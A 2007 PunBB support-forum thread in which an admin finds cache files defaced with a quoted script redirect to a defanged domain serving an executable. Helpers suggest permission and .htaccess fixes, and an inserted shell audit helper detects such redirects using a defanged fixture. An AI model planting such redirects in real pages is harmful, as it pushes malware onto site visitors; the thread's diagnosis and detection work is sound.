Topic: Executable Code in profiles

Hi,

Is it possible for someone to input some form of coding/HTML into a textarea field within a user's profile that will be an (.exe) executable file (auto-opening) to disrupt/hack or crash a PunBB forum? Because I think it happened to me from a new user who had just signed up. When I went to log on to my forum, everything was looking really "haywire" until I got a chance to delete that user; then everything cleared up after that. Sshhhhhh......

Has this happened to anyone else?

Re: Executable Code in profiles

That would be an XSS attack. As far as I know there aren't any in PunBB right now, so I'd look into the mods you have installed. If you manage to find the cause, make sure to report it to the author (you can email any member of the dev team if the bug happens to be in PunBB).

3 (edited by IDunno 2007-02-25 13:14)

Re: Executable Code in profiles

In fact I found this malicious code posted in my "Calendar". It seems that when I try to look at my calendar, the program will try to auto-open. The file name is "giris.exe". Seems to be emanating/parsing from the URL (mkekilli.com).

Got to try and delete the calendar db/content to clear this malicious code.


PS...... DON'T CLICK ON THE LINK, I JUST FOUND OUT THAT IT WILL DOWNLOAD!!!!! .....YIKES!!!!


I took out the www. Should be safe now. But do not open.

Re: Executable Code in profiles

PunBB doesn't have a calendar, so maybe that's a mod?

"Programming is like sex: one mistake and you have to support it for the rest of your life."

5 (edited by IDunno 2007-02-25 13:20)

Re: Executable Code in profiles

Yes, it's the "Calendar" mod..

Somehow stuck that code in the calendar posts (I think). Checking now....

6 (edited by IDunno 2007-02-25 13:44)

Re: Executable Code in profiles

Didn't find anything in my SQL database. But when I checked my "cache", there it WAS!!!! ...WOW!!!! Somehow that person got an "index.htm" and an "index.php" file to load into my cache directory folder, and into some of my cache_quickjump files!!!! ..Shit!!!


This is what I found in the index.htm file and my quickjump files:

<script>location.href="h-t-t-p://w-w-w-.mkekilli.com/giris.exe";</script>


Since I am not a coder, how the hell did this person get this stuff into my cache folder???

Re: Executable Code in profiles

Could you email a copy of the file to me please? My email is smartys at this domain.

Re: Executable Code in profiles

Hi Smarty,

Ok, I'll send you files....

Re: Executable Code in profiles

I cannot figure out how that person cleared my cache quickjump files of all content to stick that script code in all of them, including uploading an index.htm into my cache folder with that same code?

Sssshhhheeesh......

Re: Executable Code in profiles

I can't be certain, but my guess is that the person had some other access to your forum (i.e. they compromised another site) and then used a script to deface more sites on the same server.

11 (edited by IDunno 2007-02-25 14:19)

Re: Executable Code in profiles

I think you're right. I also have a stand-alone event calendar, and I just found out that all of my (XML) files had been hacked too....... Oh boy.......

Thanks Smarty for the info!

12 (edited by IDunno 2007-02-25 14:22)

Re: Executable Code in profiles

Smartys wrote:

I can't be certain, but my guess is that the person had some other access to your forum (i.e. they compromised another site) and then used a script to deface more sites on the same server.

Smarty, how did this person manage to get into my site to do this stuff??? Do I have a loophole somewhere??? And how do I prevent this from happening again??

Re: Executable Code in profiles

I would contact your host and ask them: they're in a better position to figure it out.

Re: Executable Code in profiles

Ok, I'll do that.

Thanks Man!

Re: Executable Code in profiles

It looks like the intruder managed to gain sufficient access to overwrite all world-writable files and add files to world-writable directories (i.e. files and folders with 666 or 777 permissions). That suggests that it's likely that access was gained via an insecure PHP script rather than by someone logging in via FTP under my username and password.

16 (edited by IDunno 2007-02-25 21:50)

Re: Executable Code in profiles

Hi Smarty,

Would it be possible to throw in a .htaccess file in the cache folder or any other "writable folders" to stop someone from accessing PHP files? Say something like this:

<Files *.php>
Deny from all
</Files>

Would this work? Just wondering...

Thanks

Re: Executable Code in profiles

*Off topic*

Hey IDunno :)

Re: Executable Code in profiles

IDunno wrote:

Hi Smarty,

Would it be possible to throw in a .htaccess file in the cache folder or any other "writable folders" to stop someone from accessing PHP files? Say something like this:

<Files *.php>
Deny from all
</Files>

Would this work? Just wondering...

Thanks

A similar .htaccess file is there by default: I would assume it was removed by your friendly hacker.

Re: Executable Code in profiles

Oh really? You mean there is already supposed to be a .htaccess file in there? Guess that guy removed it then too.

Smarty, do me a favor if you can: paste me over the .htaccess code for that cache folder so I can regenerate a new .htaccess file to stick back in there. Would appreciate it!

Thanks!

Re: Executable Code in profiles

<Limit GET POST PUT>
Order Allow,Deny
Deny from All
</Limit>

Re: Executable Code in profiles

Smartys wrote:
<Limit GET POST PUT>
Order Allow,Deny
Deny from All
</Limit>

Thanks Smarty!!!! Appreciate it!!!

Cheers

Re: Executable Code in profiles

Just a final thought: since this vulnerability exploited my cache directory, it's my assumption they got in through command-line access, since the cache directory and cache files were world-writable and easily accessed this way. Maybe any world-writable files or data that are stored in the www in the next PunBB version should instead be stored in the MySQL database, to better avoid this type of thing happening in future.

Just my thought though, but thanks to everyone who had helped me with my problem.

Cheers!

Re: Executable Code in profiles

The whole point of having the cache is that it isn't stored in the database ;)
And the stuff doesn't have to be world-writable: it completely depends on your settings. I know, for example, that my cache files, avatars, etc. are only writable by the user that created them.
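The permission and .htaccess points made in the last few posts can be checked mechanically. The following POSIX shell helper is an added example, not code from the thread or from PunBB: it lists world-writable files and directories under a web root, tests whether the cache directory still carries a deny-all .htaccess, greps for cache files that have been replaced with a script redirect (the defacement pattern IDunno found), and can rewrite the .htaccess Smartys quoted. The sample web root it builds is a constructed fixture with a defanged redirect target; the path names are assumptions.

```sh
#!/bin/sh
# Added audit helper, not PunBB's own code. Looks for the three symptoms
# discussed in this thread: files/directories writable by "other" (666/777),
# a cache directory whose deny-all .htaccess is missing, and cache files
# replaced with a <script>location.href=... redirect (the pattern found in
# index.htm and the cache_quickjump files). Fixture paths are assumptions.

# Print every file or directory under $1 that is writable by "other".
find_world_writable() {
    find "$1" ! -type l -perm -o+w
}

# Exit 0 if $1/.htaccess exists and carries a "Deny from all" directive.
has_deny_htaccess() {
    [ -f "$1/.htaccess" ] && grep -qi 'deny from all' "$1/.htaccess"
}

# Print the names of files under $1 whose content is a client-side redirect.
find_injected_redirects() {
    grep -rli '<script>[[:space:]]*location\.href[[:space:]]*=' "$1"
}

# Recreate the cache .htaccess that Smartys quoted above, in directory $1.
restore_cache_htaccess() {
    printf '%s\n' '<Limit GET POST PUT>' 'Order Allow,Deny' \
        'Deny from All' '</Limit>' > "$1/.htaccess"
}

# Build a constructed sample web root so the checks run offline; prints its
# path. The redirect target is a defanged placeholder, not the real domain.
make_sample_root() {
    dir=$(mktemp -d)
    mkdir -p "$dir/cache" "$dir/avatars"
    chmod 777 "$dir/cache"        # the weak setting
    chmod 755 "$dir/avatars"      # owner-writable only, as Smartys describes
    printf '<?php $x = 1; ?>\n' > "$dir/cache/cache_config.php"
    chmod 644 "$dir/cache/cache_config.php"
    printf '<script>location.href="http://example.invalid/giris.exe";</script>\n' \
        > "$dir/cache/cache_quickjump_1.php"   # constructed defaced file
    chmod 666 "$dir/cache/cache_quickjump_1.php"
    printf '%s\n' "$dir"
}

# Run all checks against a real web root, e.g.: audit_root /var/www/punbb
audit_root() {
    echo "== world-writable =="; find_world_writable "$1"
    echo "== injected redirects =="; find_injected_redirects "$1" || true
    has_deny_htaccess "$1/cache" && echo "cache/.htaccess: OK" || echo "cache/.htaccess: MISSING"
}
```

Source the file and call `audit_root` on the forum's document root; anything listed under world-writable should be tightened to owner-writable, and any listed redirect file should be restored from a clean copy rather than edited in place.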

Re: Executable Code in profiles

This is kind of scary. Is it possible for these guys to hack into our servers through PunBB? What if someone has their forums on an e-commerce site? Yikes...

Re: Executable Code in profiles

Burnsy86 wrote:

This is kind of scary. Is it possible for these guys to hack into our servers through PunBB? What if someone has their forums on an e-commerce site? Yikes...

Unless I've missed something, nobody has found an exploit in PunBB here :)